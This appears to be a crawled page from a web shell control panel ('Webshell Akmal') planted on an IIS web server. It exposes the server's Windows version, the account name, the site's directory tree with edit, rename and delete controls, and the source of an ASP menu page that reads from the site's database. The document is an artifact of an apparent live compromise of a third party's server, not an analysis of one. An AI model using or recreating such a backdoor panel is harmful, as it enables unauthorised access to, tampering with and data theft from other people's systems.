Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!--#include file="conn.asp"--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> <!-- * {margin:0px;padding:0px;} body {overflow:scroll;font-size:12px;font-family:Arial, Helvetica, sans-serif;color:#000;} a {font-size:12px;font-family:Arial, Helvetica, sans-serif;color:#000;text-decoration:none;} .menu {position:relative;width:1000px;background-color:#360;} .menu ul {list-style-type:none;} .menu li {float:left;position:relative;} .menu ul ul {visibility:hidden;position:absolute;left:3px;top:22px;border:1px solid #000;} .menu table {position:absolute; top:0; left:0;} .menu ul li:hover ul, .menu ul a:hover ul{visibility:visible;} .menu a{display:block;background:#360;padding:2px 10px;color:#fff;text-decoration:none;border:1px solid #360;} .menu a:hover{background:#690;color:#000;} .menu ul ul, .menu ul ul li {clear:both;text-align:left;} .menu ul ul li a{display:block;width:100px;height:15px;} .menu ul ul li a:hover{background:#690;} --> </style> <% Thispage ="http://" & Request.ServerVariables("SERVER_NAME")& Request.ServerVariables("URL") %> </head> <body style=" text-align:left"> <div class="menu"> <ul> <li> <% Set rs=Server.CreateObject("ADODB.Recordset") sql1="select [id],[CName],[Cid] from [menu] where Cid=2 order by Sort asc,id desc" rs.Open sql1,conn,1,1 do while not rs.eof %> <a href="www.baidu.com" style="color:#FFFFFF; font-size:16px"><%=rs("CName")%></a> <!--[if IE 7]><!--></a><!--<![endif]--> <!--[if lte IE 6]><table><tr><td><![endif]--> <ul> <% Set rs1=Server.CreateObject("ADODB.Recordset") sql2="select [id],[CName],[Cid] from [menu] where Cid="&rs("id")&" order by Sort asc,id desc" rs1.Open sql2,conn,1,1 do while not rs1.eof %> <li><a href="#"><%=rs1("CName")%></a></li> <% rs1.movenext loop rs1.close set rs1=Nothing %> </ul> <% rs.movenext loop rs.close set rs=Nothing conn.Close set conn=Nothing %> <!--[if lte IE 6]></td></tr></table></a><![endif]--> </li> </ul> </div> </body> </html>